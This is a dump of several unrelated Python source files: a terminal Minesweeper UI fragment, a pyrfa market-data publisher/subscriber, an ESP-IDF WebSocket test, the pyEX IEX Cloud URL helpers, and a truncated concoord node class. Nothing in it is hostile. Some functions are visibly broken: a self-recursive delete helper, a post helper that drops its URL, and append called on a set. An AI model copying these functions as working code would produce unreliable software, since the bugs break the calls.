self.minefieldClass = Minesweeper(width,height,mines)
self.minefieldGrid.values = self.minefieldClass.matrixTuples
### WIDGETS
class MinefieldGridWidget(nps.SimpleGrid):
"""Minefield Widget Module
This extends the class SimpleGrid from npyscreen.
It contains the minefield grid.
It applies custom colors to the square depending on the square value.
NOTES:
Each cell is a Tuple (Status,Number)
-> status - (flaged -1/hidden 0/visible 1)
-> number - square number (or -1 for mines)
"""
def custom_print_cell(self, actual_cell, display_value):
"""Custom cell color and value
This function changes the color of the cell, depending on its
gameplay status and value.
"""
if display_value:
aux = re.sub("[()]","",display_value)
aux = re.split(", ", aux)
status = aux[0]
number = aux[1]
square = tuple((status,number))
if status == "-1":
actual_cell.value = "F"
actual_cell.color = 'CAUTION'
elif status == "0":
actual_cell.value = "#"
actual_cell.color = 'DEFAULT' # debug
# actual_cell.color = 'VERYGOOD' # debug
else:
if number == "-1":
actual_cell.value = "*"
actual_cell.color = 'CAUTION' # debug
# actual_cell.color = 'CRITICAL' # debug
else:
actual_cell.value = number
if number == "0":
actual_cell.value = " "
actual_cell.color = 'DEFAULT'
elif number == "1":
actual_cell.color = 'STANDOUT'
elif number == "2":
actual_cell.color = 'SAFE'
elif number == "3":
actual_cell.color = 'DANGER'
elif number == "4":
actual_cell.color = 'NO_EDIT'
elif number == "5":
actual_cell.color = 'NO_EDIT'
elif number == "6":
actual_cell.color = 'NO_EDIT'
elif number == "7":
actual_cell.color = 'NO_EDIT'
elif number == "8":
actual_cell.color = 'NO_EDIT'
# else:
# actual_cell.color = 'DEFAULT' # debug
def runTerminal(options):
"""Run the game in Terminal
If options is None, a Menu will be opened to the Player.
Otherwise the game will jump to the Map form, and set the Player name,
and Map Dificulty using the options values.
options = tuple(name, dificulty)
"""
app = App()
if options:
name, dificulty = options
app.setGameOptions(name, dificulty)
app.run()
def show_rankings(rankings, top):
"""Rankings Pretty print"""
if top<1: top=5
for dificulty,rankings in rankings:
print(dificulty)
for player,time in rankings[:top]:
print(">",player,time)
#TODO move to minesweeper class
def submit_time(dificulty, player, time):
rankings_file = open('ranking.json')
rankings = json.load(rankings_file)
time = int(time)
try:
rankings[dificulty][player].append(time)
except:
rankings[dificulty][player] = [time]
rankings_file = open('ranking.json', 'w')
json.dump(rankings, rankings_file, indent=2)
@click.command()
@click.option('-n', '--name', default="NoName", help='Player name (used in rankings)')
@click.option('-d', '--dificulty', help='Map Dificulty (Easy, Normal, Hard, Custom)')
@click.option('--rankings', help='Show Rankings')
@click.option('--import', 'import_file', help='Import Rankings from file')
@click.option('--export', 'export_file', help='Export Rankings to file')
@click.option('--merge', 'merge_file', help='Merge Rankings from file with current Rankings')
def main(name, dificulty, rankings, import_file, export_file, merge_file):
# print("ARGS=>", name, dificulty, rankings, import_file, export_file, merge_file) # debug
if import_file:
Minesweeper.import_rankings(import_file)
elif export_file:
Minesweeper.export_rankings(export_file)
elif merge_file:
Minesweeper.merge_rankings(merge_file)
elif rankings:
ranks = Minesweeper.get_rankings()
show_rankings(ranks, int(rankings))
elif dificulty:
runTerminal((name, dificulty))
else:
runTerminal(None)
if __name__ == "__main__":
main()
|
multiprocess.py
|
#!/usr/bin/python
#
# Interactive (server) publisher for market price domain
#
import time
import multiprocessing
import random
import pyrfa
def publish():
try:
p = pyrfa.Pyrfa()
p.createConfigDb("./pyrfa.cfg")
p.acquireSession("Session4")
p.createOMMProvider()
p.login()
p.dictionaryRequest()
IMAGES = {'RIC':'EUR=', 'RDNDISPLAY':200, 'RDN_EXCHID':155, 'BID':0.988, 'ASK':0.999, 'DIVPAYDATE':'20110623'},
IMAGES = {'RIC':'JPY=', 'RDNDISPLAY':200, 'RDN_EXCHID':'NAS', 'OFFCL_CODE':'isin1234XYZ', 'BID':4.23, 'DIVPAYDATE':'20110623', 'OPEN_TIME':'09:00:01.000'},
p.marketPriceSubmit(IMAGES)
vol = 1000
while True:
time.sleep(1)
vol += 1
price = round(round(4 + random.random(),3),3)
UPDATES = {'RIC':'EUR=', 'ACVOL_1':vol, 'TRDPRC_1':price},
UPDATES += {'RIC':'JPY=', 'BID_NET_CH':0.0041, 'BID':0.988, 'ASK':0.999,'ASK_TIME':'now'},
p.marketPriceSubmit(UPDATES)
except:
pass
def subscribe():
try:
try:
p = pyrfa.Pyrfa()
p.createConfigDb("./pyrfa.cfg")
p.acquireSession("Session3")
p.createOMMConsumer()
p.login()
p.directoryRequest()
p.dictionaryRequest()
p.marketPriceRequest("EUR=,JPY=")
while True:
time.sleep(0.01)
for u in p.dispatchEventQueue():
print("\n" + u['SERVICE'] + " - " + u['RIC'])
for k,v in u.items():
print("%15s %g" % (k,v) if type(v) is float else "%15s %s" % (k,v))
finally:
p.marketPriceCloseAllRequest()
except:
pass
if __name__ == "__main__":
try:
try:
t_publish = multiprocessing.Process(target=publish)
t_publish.start()
#wait 10s until the service is up
time.sleep(10)
t_subscribe = multiprocessing.Process(target=subscribe)
t_subscribe.start()
while True:
time.sleep(0.01)
finally:
time.sleep(1)
for process in multiprocessing.active_children():
process.terminate()
except:
pass
|
app_test.py
|
from __future__ import unicode_literals
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from tiny_test_fw import Utility
import glob
import json
import os
import re
import threading
import ttfw_idf
class IDEWSProtocol(WebSocket):
def handleMessage(self):
try:
j = json.loads(self.data)
except Exception as e:
Utility.console_log('Server ignores error: {}'.format(e), 'orange')
return
event = j.get('event')
if event and 'prog' in j and ((event == 'gdb_stub' and 'port' in j) or
(event == 'coredump' and 'file' in j)):
payload = {'event': 'debug_finished'}
self.sendMessage(json.dumps(payload))
Utility.console_log('Server sent: {}'.format(payload))
else:
Utility.console_log('Server received: {}'.format(j), 'orange')
def handleConnected(self):
Utility.console_log('{} connected to server'.format(self.address))
def handleClose(self):
Utility.console_log('{} closed the connection'.format(self.address))
class WebSocketServer(object):
HOST = '127.0.0.1'
PORT = 1123
def run(self):
server = SimpleWebSocketServer(self.HOST, self.PORT, IDEWSProtocol)
while not self.exit_event.is_set():
server.serveonce()
def __init__(self):
self.exit_event = threading.Event()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.exit_event.set()
self.thread.join(10)
if self.thread.is_alive():
Utility.console_log('Thread cannot be joined', 'orange')
@ttfw_idf.idf_custom_test(env_tag='test_jtag_arm', group='test-apps')
def test_monitor_ide_integration(env, extra_data):
config_files = glob.glob(os.path.join(os.path.dirname(__file__), 'sdkconfig.ci.*'))
config_names = [os.path.basename(s).replace('sdkconfig.ci.', '') for s in config_files]
rel_proj_path = 'tools/test_apps/system/monitor_ide_integration'
for name in config_names:
Utility.console_log('Checking config "{}"... '.format(name), 'green', end='')
dut = env.get_dut('panic', rel_proj_path, app_config_name=name)
monitor_path = os.path.join(dut.app.idf_path, 'tools/idf_monitor.py')
elf_path = os.path.join(dut.app.binary_path, 'panic.elf')
dut.start_app()
# Closing the DUT because we will reconnect with IDF Monitor
env.close_dut(dut.name)
with WebSocketServer(), ttfw_idf.CustomProcess(' '.join([monitor_path,
elf_path,
'--ws', 'ws://{}:{}'.format(WebSocketServer.HOST,
WebSocketServer.PORT)]),
logfile='monitor_{}.log'.format(name)) as p:
p.pexpect_proc.expect(re.compile(r'Guru Meditation Error'), timeout=10)
p.pexpect_proc.expect_exact('Communicating through WebSocket', timeout=5)
# "u?" is for Python 2 only in the following regular expressions.
# The elements of dictionary can be printed in different order depending on the Python version.
p.pexpect_proc.expect(re.compile(r"WebSocket sent: \{u?.*'event': u?'" + name + "'"), timeout=5)
p.pexpect_proc.expect_exact('Waiting for debug finished event', timeout=5)
p.pexpect_proc.expect(re.compile(r"WebSocket received: \{u?'event': u?'debug_finished'\}"), timeout=5)
p.pexpect_proc.expect_exact('Communications through WebSocket is finished', timeout=5)
if __name__ == '__main__':
test_monitor_ide_integration()
|
urls.py
|
# *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from __future__ import print_function
import json
import os
import os.path
from threading import Event, Thread
from urllib.parse import urlparse
import requests
from socketIO_client_nexus import BaseNamespace, SocketIO
from sseclient import SSEClient
from .exception import PyEXception, PyEXStopSSE
_URL_PREFIX = "https://api.iextrading.com/1.0/"
_URL_PREFIX_CLOUD = "https://cloud.iexapis.com/{version}/"
_URL_PREFIX_CLOUD_ORIG = _URL_PREFIX_CLOUD
_URL_PREFIX_CLOUD_SANDBOX = "https://sandbox.iexapis.com/stable/"
_SIO_URL_PREFIX = "https://ws-api.iextrading.com"
_SIO_PORT = 443
_SSE_URL_PREFIX = (
"https://cloud-sse.iexapis.com/{version}/{channel}?symbols={symbols}&token={token}"
)
_SSE_URL_PREFIX_ORIG = _SSE_URL_PREFIX
_SSE_URL_PREFIX_ALL = "https://cloud-sse.iexapis.com/{version}/{channel}?token={token}"
_SSE_DEEP_URL_PREFIX = "https://cloud-sse.iexapis.com/{version}/deep?symbols={symbols}&channels={channels}&token={token}"
_SSE_URL_PREFIX_SANDBOX = (
"https://sandbox-sse.iexapis.com/stable/{channel}?symbols={symbols}&token={token}"
)
_SSE_URL_PREFIX_ALL_SANDBOX = (
"https://sandbox-sse.iexapis.com/stable/{channel}?token={token}"
)
_SSE_DEEP_URL_PREFIX_SANDBOX = "https://sandbox-sse.iexapis.com/stable/deep?symbols={symbols}&channels={channels}&token={token}"
_PYEX_PROXIES = None
def _get(url, token="", version="stable", filter="", format="json"):
"""for backwards compat, accepting token and version but ignoring"""
token = token or os.environ.get("IEX_TOKEN")
if token:
if version == "sandbox":
return _getIEXCloudSandbox(url, token, version, filter, format)
return _getIEXCloud(url, token, version, filter, format)
return _getOrig(url)
async def _getAsync(url, token="", version="stable", filter="", format="json"):
"""for backwards compat, accepting token and version but ignoring"""
token = token or os.environ.get("IEX_TOKEN")
if token:
if version == "sandbox":
return await _getIEXCloudSandboxAsync(url, token, version, filter, format)
return await _getIEXCloudAsync(url, token, version, filter, format)
return _getOrig(url)
def _post(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
token = token or os.environ.get("IEX_TOKEN")
if version == "sandbox":
return _postIEXCloudSandbox(
url, data, json, token, version, token_in_params, format
)
return _postIEXCloud(url, data, json, token, version, token_in_params, format)
def _delete(url, token="", version="stable", format="json"):
token = token or os.environ.get("IEX_TOKEN")
if version == "sandbox":
return _deleteIEXCloudSandbox(url, token, version, format)
return _deleteIEXCloud(url, token, version, format)
def _getOrig(url):
raise PyEXception(
"Old IEX API is deprecated. For a free API token, sign up at https://iexcloud.io"
)
def _getIEXCloudBase(
base_url, url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
url = base_url.format(version=version) + url
params = {"token": token}
if filter:
params["filter"] = filter
if format not in ("json", "binary") and isinstance(format, str):
params["format"] = format
resp = requests.get(urlparse(url).geturl(), proxies=_PYEX_PROXIES, params=params)
if resp.status_code == 200:
if format == "json":
return resp.json()
elif format == "binary":
return resp.content
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _getIEXCloud(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return _getIEXCloudBase(_URL_PREFIX_CLOUD, url, token, version, filter, format)
async def _getIEXCloudAsyncBase(
base_url, url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
import aiohttp
url = _URL_PREFIX_CLOUD.format(version=version) + url
params = {"token": token}
if filter:
params["filter"] = filter
if format not in ("json", "binary"):
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.get(
urlparse(url).geturl(), proxy=_PYEX_PROXIES, params=params
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
elif format == "binary":
return await resp.read()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _getIEXCloudAsync(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return await _getIEXCloudAsyncBase(
_URL_PREFIX_CLOUD, url, token, version, filter, format
)
def _getIEXCloudSandbox(url, token="", version="stable", filter="", format="json"):
"""for iex cloud"""
return _getIEXCloudBase(
_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", filter, format
)
async def _getIEXCloudSandboxAsync(
url, token="", version="stable", filter="", format="json"
):
"""for iex cloud"""
return await _getIEXCloudAsyncBase(
_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", filter, format
)
def _postIEXCloudBase(
base_url,
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
url = base_url.format(version=version) + url
if token_in_params:
params = {"token": token}
else:
params = {}
if format != "json":
params["format"] = format
resp = requests.post(
urlparse(url).geturl(),
data=data,
json=json,
proxies=_PYEX_PROXIES,
params=params,
)
if resp.status_code == 200:
if format == "json":
return resp.json()
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _postIEXCloud(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return _postIEXCloudBase(
_URL_PREFIX_CLOUD, data, json, token, version, token_in_params, format
)
async def _postIEXCloudAsyncBase(
base_url,
url,
data=None,
json=None,
token="",
version="stable",
filter="",
token_in_params=True,
format="json",
):
"""for iex cloud"""
import aiohttp
url = base_url.format(version=version) + url
if token_in_params:
params = {"token": token}
else:
params = {}
if format != "json":
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.post(
urlparse(url).geturl(),
data=data,
json=json,
proxy=_PYEX_PROXIES,
params=params,
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _postIEXCloudAsync(
url,
data=None,
json=None,
token="",
version="stable",
filter="",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return await _postIEXCloudAsyncBase(
_URL_PREFIX_CLOUD,
url,
data,
json,
token,
version,
filter,
token_in_params,
format,
)
def _postIEXCloudSandbox(
url,
data=None,
json=None,
token="",
version="stable",
token_in_params=True,
format="json",
):
"""for iex cloud"""
return _postIEXCloudBase(
_URL_PREFIX_CLOUD_SANDBOX,
url,
data,
json,
token,
"stable",
token_in_params,
format,
)
def _deleteIEXCloudBase(base_url, url, token="", version="stable", format="json"):
"""for iex cloud"""
url = base_url.format(version=version) + url
params = {"token": token}
if format != "json":
params["format"] = format
resp = requests.delete(urlparse(url).geturl(), proxies=_PYEX_PROXIES, params=params)
if resp.status_code == 200:
if format == "json":
return resp.json()
return resp.text
raise PyEXception("Response %d - " % resp.status_code, resp.text)
def _deleteIEXCloud(url, token="", version="stable", format="json"):
"""for iex cloud"""
return _deleteIEXCloud(_URL_PREFIX_CLOUD, url, token, version, format)
async def _deleteIEXCloudAsyncBase(url, token="", version="stable", format="json"):
"""for iex cloud"""
import aiohttp
url = _URL_PREFIX_CLOUD.format(version=version) + url
params = {"token": token}
if format != "json":
params["format"] = format
async with aiohttp.ClientSession() as session:
async with session.delete(
urlparse(url).geturl(), proxy=_PYEX_PROXIES, params=params
) as resp:
if resp.status == 200:
if format == "json":
return await resp.json()
return resp.text()
raise PyEXception("Response %d - " % resp.status, await resp.text())
async def _deleteIEXCloudAsync(url, token="", version="stable", format="json"):
"""for iex cloud"""
return await _deleteIEXCloudAsyncBase(
_URL_PREFIX_CLOUD, url, token, version, format
)
def _deleteIEXCloudSandbox(url, token="", version="stable", format="json"):
"""for iex cloud"""
return _deleteIEXCloudBase(_URL_PREFIX_CLOUD_SANDBOX, url, token, "stable", format)
def _wsURL(url):
"""internal"""
return "/1.0/" + url
def _tryJson(data, raw=True):
"""internal"""
if raw:
return data
try:
return json.loads(data)
except ValueError:
return data
class WSClient(object):
def __init__(
self, addr, sendinit=None, on_data=None, on_open=None, on_close=None, raw=True
):
"""
addr: path to sio
sendinit: tuple to emit
on_data, on_open, on_close: functions to call
"""
self.addr = addr
self.sendinit = sendinit
on_data = on_data or print
class Namespace(BaseNamespace):
def on_connect(self, *data):
if on_open:
on_open(_tryJson(data, raw))
def on_disconnect(self, *data):
if on_close:
on_close(_tryJson(data, raw))
def on_message(self, data):
on_data(_tryJson(data, raw))
self._Namespace = Namespace
def run(self):
self.socketIO = SocketIO(_SIO_URL_PREFIX, _SIO_PORT)
self.namespace = self.socketIO.define(self._Namespace, self.addr)
if self.sendinit:
self.namespace.emit(*self.sendinit)
self.socketIO.wait()
def _stream(url, sendinit=None, on_data=print):
"""internal"""
cl = WSClient(url, sendinit=sendinit, on_data=on_data)
return cl
def _streamSSE(url, on_data=print, exit=None):
"""internal"""
messages = SSEClient(url, proxies=_PYEX_PROXIES, headers={"keep_alive": "false"})
def _runner(messages=messages, on_data=on_data):
for msg in messages:
data = msg.data
try:
on_data(json.loads(data))
except PyEXStopSSE:
# stop listening and return
print("HERE3")
return
except (json.JSONDecodeError, KeyboardInterrupt):
print("HERE4")
raise
except Exception:
print("HERE5")
raise
def _exit(messages=messages, exit=exit):
# run runner in wrapper
runthread = Thread(target=_runner)
# die with parent
runthread.daemon = True
# start the runner
runthread.start()
# wait for exit event
exit.wait()
# kill
killerthread = Thread(target=lambda: messages.resp.close())
# die with parent
killerthread.daemon = True
# start the killer
killerthread.start()
return
if isinstance(exit, Event):
# run on thread, stop when exit set
exitthread = Thread(target=_exit)
# start the threads
exitthread.start()
# return the threads
return exitthread
else:
# just call and return the function
return _runner()
async def _streamSSEAsync(url, exit=None):
"""internal"""
from asyncio import Event
from aiohttp_sse_client import client as sse_client
from aiostream.stream import merge
async with sse_client.EventSource(url) as event_source:
if isinstance(exit, Event):
async def _waitExit():
yield await exit.wait()
waits = (_waitExit(), event_source)
else:
waits = (event_source,)
try:
async with merge(*waits).stream() as stream:
try:
async for event in stream:
if event == True: # noqa: E712
return
yield json.loads(event.data)
except ConnectionError:
raise PyEXception("Could not connect to SSE Stream")
except PyEXStopSSE:
return
except BaseException:
raise
except (json.JSONDecodeError, KeyboardInterrupt):
raise
def setProxy(proxies=None):
"""Set proxies argument for requests
Args:
proxies (dict): Proxies to set
"""
global _PYEX_PROXIES
_PYEX_PROXIES = proxies
def overrideUrl(url="", env=""):
"""Override the default IEX Cloud url"""
global _URL_PREFIX_CLOUD
if env:
_URL_PREFIX_CLOUD = "https://cloud.{env}.iexapis.com/{{version}}/".format(
env=env
)
elif url:
_URL_PREFIX_CLOUD = url
else:
# reset
_URL_PREFIX_CLOUD = _URL_PREFIX_CLOUD_ORIG
def overrideSSEUrl(url="", env=""):
"""Override the default IEX Cloud SSE url"""
global _SSE_URL_PREFIX
if env:
_SSE_URL_PREFIX = "https://cloud-sse.{env}.iexapis.com/{{version}}/{{channel}}?symbols={{symbols}}&token={{token}}".format(
env=env
)
elif url:
_SSE_URL_PREFIX = url
else:
# reset
_SSE_URL_PREFIX = _SSE_URL_PREFIX_ORIG
|
node.py
|
'''
@author: Deniz Altinbuken, Emin Gun Sirer
@note: Master class for all nodes
@copyright: See LICENSE
'''
import argparse
import os, sys
import random, struct
import cPickle as pickle
import time, socket, select
from Queue import Queue
from threading import Thread, RLock, Lock, Condition, Timer, Semaphore
from concoord.enums import *
from concoord.nameserver import Nameserver
from concoord.exception import ConnectionError
from concoord.utils import *
from concoord.message import *
from concoord.pack import *
from concoord.pvalue import PValueSet
from concoord.connection import ConnectionPool, Connection, SelfConnection
try:
import dns.resolver, dns.exception
except:
print("Install dnspython: http://www.dnspython.org/")
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--addr", action="store", dest="addr",
help="address for the node")
parser.add_argument("-p", "--port", action="store", dest="port", type=int,
help="port for the node")
parser.add_argument("-b", "--boot", action="store", dest="bootstrap",
help="address:port tuple for the bootstrap peer")
parser.add_argument("-o", "--objectname", action="store", dest="objectname", default='',
help="client object dotted name")
parser.add_argument("-l", "--logger", action="store", dest="logger", default='',
help="logger address")
parser.add_argument("-n", "--domainname", action="store", dest="domain", default='',
help="domain name that the nameserver will accept queries for")
parser.add_argument("-r", "--route53", action="store_true", dest="route53", default=False,
help="use Route53 (requires a Route53 zone)")
parser.add_argument("-w", "--writetodisk", action="store_true", dest="writetodisk", default=False,
help="writing to disk on/off")
parser.add_argument("-d", "--debug", action="store_true", dest="debug", default=False,
help="debug on/off")
args = parser.parse_args()
class Node():
"""Node encloses the basic Node behaviour and state that
are extended by Replicas and Nameservers.
"""
def __init__(self,
addr=args.addr,
port=args.port,
givenbootstraplist=args.bootstrap,
debugoption=args.debug,
objectname=args.objectname,
logger=args.logger,
writetodisk=args.writetodisk):
self.addr = addr if addr else findOwnIP()
self.port = port
self.debug = debugoption
self.durable = writetodisk
self.isnameserver = args.domain != ''
self.domain = args.domain
self.useroute53 = args.route53
if objectname == '':
parser.print_help()
self._graceexit(1)
self.objectname = objectname
# initialize receive queue
self.receivedmessages_semaphore = Semaphore(0)
self.receivedmessages = []
# lock to synchronize message handling
self.lock = Lock()
# create server socket and bind to a port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setblocking(0)
if self.port:
try:
self.socket.bind((self.addr,self.port))
except socket.error as e:
print "Cannot bind to port %d" % self.port
print "Socket Error: ", e
self._graceexit(1)
else:
for i in range(50):
self.port = random.randint(14000,15000)
try:
self.socket.bind((self.addr,self.port))
break
except socket.error as e:
print "Socket Error: ", e
self.socket.listen(10)
self.connectionpool = ConnectionPool()
try:
self.connectionpool.epoll = select.epoll()
except AttributeError as e:
# the os doesn't support epoll
self.connectionpool.epoll = None
# set the logger
if logger:
LOGGERNODE = logger
else:
LOGGERNODE = None
# Initialize replicas
# Keeps {peer:outofreachcount}
self.replicas = {}
# Nameserver state
if self.isnameserver:
self.type = NODE_NAMESERVER
try:
self.nameserver = Nameserver(self.addr, self.domain, self.useroute53,
self.replicas, self.debug)
except Exception as e:
print "Error:", e
print "Could not start Replica as a Nameserver, exiting."
self._graceexit(1)
else:
self.type = NODE_REPLICA
self.alive = True
self.me = Peer(self.addr,self.port,self.type)
# set id
self.id = '%s:%d' % (self.addr, self.port)
# add self to connectionpool
self.connectionpool.add_connection_to_self(self.me,
SelfConnection(self.receivedmessages,
self.receivedmessages_semaphore))
self.logger = Logger("%s-%s" % (node_names[self.type],self.id), lognode=LOGGERNODE)
if self.isnameserver:
self.nameserver.add_logger(self.logger)
print "%s-%s connected." % (node_names[self.type],self.id)
# Keeps the liveness of the nodes
self.nodeliveness = {}
self.bootstrapset = set()
# connect to the bootstrap node
if givenbootstraplist:
self.discoverbootstrap(givenbootstraplist)
self.connecttobootstrap()
self.stateuptodate = False
def _getipportpairs(self, bootaddr, bootport):
for node in socket.getaddrinfo(bootaddr, bootport, socket.AF_INET, socket.SOCK_STREAM):
yield Peer(node[4][0],bootport,NODE_REPLICA)
def discoverbootstrap(self, givenbootstraplist):
bootstrapstrlist = givenbootstraplist.split(",")
for bootstrap in bootstrapstrlist:
#ipaddr:port pair given as bootstrap
if bootstrap.find(":") >= 0:
bootaddr,bootport = bootstrap.split(":")
for peer in self._getipportpairs(bootaddr, int(bootport)):
self.bootstrapset.add(peer)
#dnsname given as bootstrap
else:
answers = []
try:
answers = dns.resolver.query('_concoord._tcp.'+bootstrap, 'SRV')
except (dns.resolver.NXDOMAIN, dns.exception.Timeout):
if self.debug: self.logger.write("DNS Error", "Cannot resolve %s" % str(bootstrap))
for rdata in answers:
for peer in self._getipportpairs(str(rdata.target), rdata.port):
self.bootstrapset.append(peer)
def connecttobootstrap(self):
tries = 0
keeptrying = True
while tries < BOOTSTRAPCONNECTTIMEOUT and keeptrying:
for bootpeer in self.bootstrapset:
try:
if self.debug: self.logger.write("State",
"trying to connect to bootstrap: %s" % str(bootpeer))
helomessage = create_message(MSG_HELO, self.me)
successid = self.send(helomessage, peer=bootpeer)
if successid < 0:
tries += 1
continue
keeptrying = False
break
except socket.error as e:
if self.debug: self.logger.write("Socket Error",
"cannot connect to bootstrap: %s" % str(e))
tries += 1
continue
time.sleep(1)
def startservice(self):
# Start a thread that waits for inputs
receiver_thread = Thread(target=self.server_loop, name='ReceiverThread')
receiver_thread.start()
# Start a thread with the server which will start a thread for each request
main_thread = Thread(target=self.handle_messages, name='MainThread')
main_thread.start()
# Start a thread that pings all neighbors
ping_thread = Timer(LIVENESSTIMEOUT, self.ping_neighbor)
ping_thread.name = 'PingThread'
ping_thread.start()
# Start a thread that goes through the nascentset and cleans expired ones
nascent_thread = Timer(NASCENTTIMEOUT, self.clean_nascent)
nascent_thread.name = 'NascentThread'
nascent_thread.start()
# Start a thread that waits for inputs
if self.debug:
input_thread = Thread(target=self.get_user_input_from_shell, name='InputThread')
input_thread.start()
return self
def __str__(self):
return "%s NODE %s:%d" % (node_names[self.type], self.addr, self.port)
def statestr(self):
returnstr = ""
for peer in self.replicas:
returnstr += node_names[peer.type] + " %s:%d\n" % (peer.addr,peer.port)
if hasattr(self, 'pendingcommands') and len(self.pendingcommands) > 0:
pending = "".join("%d: %s" % (cno, proposal) for cno,proposal \
in self.pendingcommands.iteritems())
returnstr = "%s\nPending:\n%s" % (returnstr, pending)
return returnstr
def ping_neighbor(self):
"""used to ping neighbors periodically"""
# Only ping neighbors that didn't send a message recently
while True:
# Check nodeliveness
for peer in self.replicas:
if peer == self.me:
continue
if peer in self.nodeliveness:
nosound = time.time() - self.nodeliveness[peer]
else:
nosound = LIVENESSTIMEOUT + 1
if nosound <= LIVENESSTIMEOUT:
# Peer is alive
self.replicas[peer] = 0
continue
if nosound > LIVENESSTIMEOUT:
# Send PING to node
if self.debug: self.logger.write("State", "Sending PING to %s" % str(peer))
pingmessage = create_message(MSG_PING, self.me)
successid = self.send(pingmessage, peer=peer)
if successid < 0 or nosound > (2*LIVENESSTIMEOUT):
# Neighbor not responding, mark the neighbor
if self.debug: self.logger.write("State",
"Neighbor not responding")
self.replicas[peer] += 1
time.sleep(LIVENESSTIMEOUT)
def clean_nascent(self):
lastnascentset = set([])
while True:
for sock in lastnascentset.intersection(self.connectionpool.nascentsockets):
# expired -- if it's not already in the set, it should be deleted
self.connectionpool.activesockets.remove(sock)
self.connectionpool.nascentsockets.remove(sock)
lastnascentset = self.connectionpool.nascentsockets
time.sleep(NASCENTTIMEOUT)
def server_loop(self):
"""Serverloop that listens to multiple connections and accepts new ones.
Server State
- inputready: sockets that are ready for reading
- exceptready: sockets that are ready according to an *exceptional condition*
"""
self.socket.listen(10)
if self.connectionpool.epoll:
self.connectionpool.epoll.register(self.socket.fileno(), select.EPOLLIN)
self.use_epoll()
else:
# the OS doesn't support epoll
self.connectionpool.activesockets.add(self.socket)
self.use_select()
self.socket.close()
return
def use_epoll(self):
while self.alive:
try:
events = self.connectionpool.epoll.poll(1)
for fileno, event in events:
if fileno == self.socket.fileno():
clientsock, clientaddr = self.socket.accept()
clientsock.setblocking(0)
self.connectionpool.epoll.register(clientsock.fileno(), select.EPOLLIN)
self.connectionpool.epollsockets[clientsock.fileno()] = clientsock
elif event & select.EPOLLIN:
success = self.handle_connection(self.connectionpool.epollsockets[fileno])
if not success:
self.connectionpool.epoll.unregister(fileno)
self.connectionpool.del_connection_by_socket(self.connectionpool.epollsockets[fileno])
self.connectionpool.epollsockets[fileno].close()
del self.connectionpool.epollsockets[fileno]
elif event & select.EPOLLHUP:
self.connectionpool.epoll.unregister(fileno)
self.connectionpool.epollsockets[fileno].close()
del self.connectionpool.epollsockets[fileno]
except KeyboardInterrupt, EOFError:
os._exit(0)
self.connectionpool.epoll.unregister(self.socket.fileno())
self.connectionpool.epoll.close()
def use_select(self):
while self.alive:
try:
inputready,outputready,exceptready = select.select(self.connectionpool.activesockets,
[],
self.connectionpool.activesockets,
1)
for s in exceptready:
if self.debug: self.logger.write("Exception", "%s" % s)
for s in inputready:
if s == self.socket:
clientsock,clientaddr = self.socket.accept()
if self.debug: self.logger.write("State",
"accepted a connection from address %s"
% str(clientaddr))
self.connectionpool.activesockets.add(clientsock)
self.connectionpool.nascentsockets.add(clientsock)
success = True
else:
success = self.handle_connection(s)
if not success:
self.connectionpool.del_connection_by_socket(s)
except KeyboardInterrupt, EOFError:
os._exit(0)
def handle_connection(self, clientsock):
"""Receives a message and calls the corresponding message handler"""
connection = self.connectionpool.get_connection_by_socket(clientsock)
try:
for message in connection.received_bytes():
if self.debug: self.logger.write("State", "received %s" % str(message))
if message.type == MSG_STATUS:
if self.debug: self.logger.write("State",
"Answering status message %s"
% self.__str__())
messagestr = pickle.dumps(self.__str__())
message = struct.pack("I", len(messagestr)) + messagestr
clientsock.send(message)
return False
# Update nodeliveness
if message.source.type != NODE_CLIENT:
self.nodeliveness[message.source] = time.time()
if message.source in self.replicas:
self.replicas[message.source] = 0
# add to receivedmessages
self.receivedmessages.append((message,connection))
self.receivedmessages_semaphore.release()
if message.type == MSG_CLIENTREQUEST or message.type == MSG_INCCLIENTREQUEST:
self.connectionpool.add_connection_to_peer(message.source, connection)
elif message.type in (MSG_HELO, MSG_HELOREPLY, MSG_UPDATE):
self.connectionpool.add_connection_to_peer(message.source, connection)
return True
except ConnectionError as e:
return False
def handle_messages(self):
while True:
self.receivedmessages_semaphore.acquire()
(message_to_process,connection) = self.receivedmessages.pop(0)
if message_to_process.type == MSG_CLIENTREQUEST:
if message_to_process.clientbatch:
self.process_message(message_to_process, connection)
continue
# check if there are other client requests waiting
msgconns = [(message_to_process,connection)]
for m,c in self.receivedmessages:
if m.type == MSG_CLIENTREQUEST:
# decrement the semaphore count
self.receivedmessages_semaphore.acquire()
# remove the m,c pair from receivedmessages
self.receivedmessages.remove((m,c))
msgconns.append((m,c))
if len(msgconns) > 1:
self.process_messagelist(msgconns)
else:
self.process_message(message_to_process, connection)
else:
